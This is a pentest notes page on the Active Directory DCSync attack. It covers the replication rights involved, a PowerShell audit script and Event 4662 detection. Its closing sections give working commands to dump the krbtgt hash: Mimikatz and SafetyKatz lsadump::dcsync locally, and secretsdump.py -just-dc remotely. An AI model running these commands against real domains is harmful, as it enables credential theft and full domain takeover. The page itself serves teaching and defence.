# DCSync

### DC-Sync

To perform a DCSync attack we need the following rights on the Domain object:

1. Replicating Directory Changes ([DS-Replication-Get-Changes](https://docs.microsoft.com/en-us/windows/win32/adschema/r-ds-replication-get-changes))
2. Replicating Directory Changes All ([DS-Replication-Get-Changes-All](https://docs.microsoft.com/en-us/windows/win32/adschema/r-ds-replication-get-changes-all))
3. Replicating Directory Changes In Filtered Set ([DS-Replication-Get-Changes-In-Filtered-Set](https://docs.microsoft.com/en-us/windows/win32/adschema/r-ds-replication-get-changes-in-filtered-set)) (this one isn’t always needed but we can add it just in case)

By default **Administrators, Domain Admins, Enterprise Admins, and Domain Controllers** groups have the required privileges.

The DCSync attack mimics a Domain Controller so that password hashes can be retrieved. It leverages the **Directory Replication Service (DRS)** Remote Protocol to request replication of user credentials from a DC.

To check who has the privileges to request user credentials from a DC:

{% code overflow="wrap" %}

```powershell
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}
```

{% endcode %}
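The PowerView one-liner above matches on the resolved right names. As an added example (not from the original page, and not PowerView code), the script below does the same audit with the built-in RSAT ActiveDirectory module, matching the three replication extended rights by their well-known schema GUIDs and flagging any principal that is not one of the default holders listed above. It assumes the ActiveDirectory module is available and that it runs from a domain-joined host; the `$ExpectedHolders` list is an assumption for a stock domain and should be adjusted to what your forest legitimately delegates.

```powershell
# Added audit example: list every Allow ACE on the domain object that grants
# DCSync-capable rights and flag principals outside the expected default set.
# Assumes the RSAT ActiveDirectory module (provides the AD:\ drive).
Import-Module ActiveDirectory

# Extended-right GUIDs of the three replication permissions (well-known schema values)
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

# Principals expected to hold these rights by default (assumption for a stock domain;
# extend with anything your forest deliberately delegates, e.g. Azure AD Connect accounts)
$ExpectedHolders = @(
    'Administrators', 'Domain Admins', 'Enterprise Admins', 'Domain Controllers',
    'Enterprise Domain Controllers', 'Enterprise Read-only Domain Controllers', 'SYSTEM'
)

function Get-DCSyncCapableAces {
    param([string]$DomainDN = (Get-ADDomain).DistinguishedName)

    $acl = Get-Acl -Path ("AD:\" + $DomainDN)
    foreach ($ace in $acl.Access) {
        # Only Allow entries grant anything; Deny entries are irrelevant here
        if ($ace.AccessControlType -ne 'Allow') { continue }

        $guid = $ace.ObjectType.ToString()
        if ($ReplicationRights.ContainsKey($guid)) {
            $rightName = $ReplicationRights[$guid]
        } elseif ($ace.ActiveDirectoryRights -match 'GenericAll') {
            # GenericAll implies every extended right, including replication
            $rightName = 'GenericAll (implies all extended rights)'
        } elseif ($ace.ActiveDirectoryRights -match 'WriteDacl') {
            # WriteDacl lets the holder grant the replication rights to anyone
            $rightName = 'WriteDacl (can grant replication rights)'
        } else {
            continue
        }

        # Strip the DOMAIN\ prefix so the name compares against the expected list
        $shortName = ($ace.IdentityReference.Value -split '\\')[-1]
        [pscustomobject]@{
            Principal  = $ace.IdentityReference.Value
            Right      = $rightName
            Inherited  = $ace.IsInherited
            Unexpected = ($ExpectedHolders -notcontains $shortName)
        }
    }
}

# Unexpected holders first: each one is either a deliberate delegation or a finding
Get-DCSyncCapableAces | Sort-Object Unexpected -Descending | Format-Table -AutoSize
```

A `WriteDacl` hit matters as much as a direct replication right, which is exactly the second scenario on this page: the holder can add the replication rights to any account. On the detection side, a DC records a successful replication request as Security Event ID 4662 on the domain object with these same GUIDs in the Properties field, so that event from an account that is not a Domain Controller is the usual alert for DCSync.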

### Example Scenarios to exploit DCSync

1. We assume that we have the hash of a user account that is a member of the Domain Admins group.

   Since the user is in the DA group, we can dump the user's hashes, perform Over-Pass-The-Hash via Mimikatz, and then run DCSync to request the KRBTGT credentials from the DC.
2. We assume that we have credentials of a user that has WriteDACL rights on the Domain object.

   Since the user has WriteDACL privileges, we can use this to grant DCSync rights to any user that we own. Once the owned user has DCSync rights, we can run Invoke-Mimikatz and perform the DCSync attack from the owned user's shell to retrieve the KRBTGT hashes.

### Exploit Locally

To use the DCSync feature to retrieve the krbtgt hash, execute one of the commands below with DA privileges for the `us` domain:

{% code overflow="wrap" %}

```powershell
Invoke-Mimikatz -Command '"lsadump::dcsync /user:us\krbtgt"'

SafetyKatz.exe "lsadump::dcsync /user:us\krbtgt" "exit"
```

{% endcode %}

### Exploit Remotely

{% code overflow="wrap" %}

```bash
secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes

[-just-dc-user <USERNAME>] #To get only of that user
[-pwd-last-set] #To see when each account's password was last changed
[-history] #To dump password history, may be helpful for offline password cracking
```

{% endcode %}
